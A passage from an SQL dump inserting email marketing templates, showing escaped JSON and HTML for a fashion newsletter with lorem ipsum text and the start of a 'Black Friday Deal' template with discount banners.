30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f5f5f5\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_33\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OIZxZQ05r6\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"-RLsY6UJmh\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XReSYqXQor\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603389173564-ff.png\\\",\\\"width\\\":251,\\\"height\\\":69},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"dGNFP6u5tP\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/facebook.com\\/\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/linkedin.com\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/\\\",\\\"name\\\":\\\"Twitter\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":5,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"INMPXUgyFl\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 15px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f5f5f5\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_35\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation&nbsp;<\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"cHUf919bht\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 22px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"170%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_36\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 170%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 20.4px;\\\\\\\">&copy; Fashion | All Rights Reserve.&nbsp;<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 170%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 20.4px;\\\\\\\"><span style=\\\\\\\"text-decoration: underline; line-height: 20.4px; font-size: 12px;\\\\\\\">Unsubscribe<\\/span>&nbsp; here<\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_23\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#000000\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_17\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":true},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":9}\"', '', 0, '2022-08-29 11:35:38');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(4, 'Black Friday Deal', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: calc(100% - 40px) !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700&display=swap\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f5f5f5;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f5f5f5;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #f5f5f5;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 10px;background-color: #242424\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 10px;background-color: #242424;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px 20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502399458599-adada_36.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 146px;\\\" width=\\\"146\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #e01223;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #e01223;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 20px 0px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 100%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 100%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\"><strong><span style=\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\"><span style=\\\"line-height: 72px; font-size: 72px;\\\">BLACK<\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 100%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\"><strong><span style=\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\"><span style=\\\"line-height: 72px; font-size: 72px;\\\">FRIDAY<\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:9px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396368642-s2ss_31.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 247px;\\\" width=\\\"247\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 20px 35px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-size: 36px; line-height: 43.2px; color: #ffffff; font-family: Lato, sans-serif;\\\">25<span style=\\\"font-size: 14px; line-height: 16.8px;\\\">TH<\\/span> NOVEMBER<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 10px;background-image: url(\'https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\');background-repeat: repeat;background-position: center top;background-color: #242424;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:21px 15px 8px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 34px; line-height: 40.8px;\\\">START FROM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-family: impact, chicago; font-size: 48px; line-height: 57.6px;\\\">40% OFF<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"33%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #CCC;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 130%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 130%;\\\"><span style=\\\"font-size: 12px; line-height: 15.6px;\\\">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,<span style=\\\"color: #e01223; font-size: 12px; line-height: 15.6px;\\\"><strong> totam rem<\\/strong><\\/span> aperiam, eaque ipsa quae ab illo <span style=\\\"font-size: 14px; line-height: 18.2px; color: 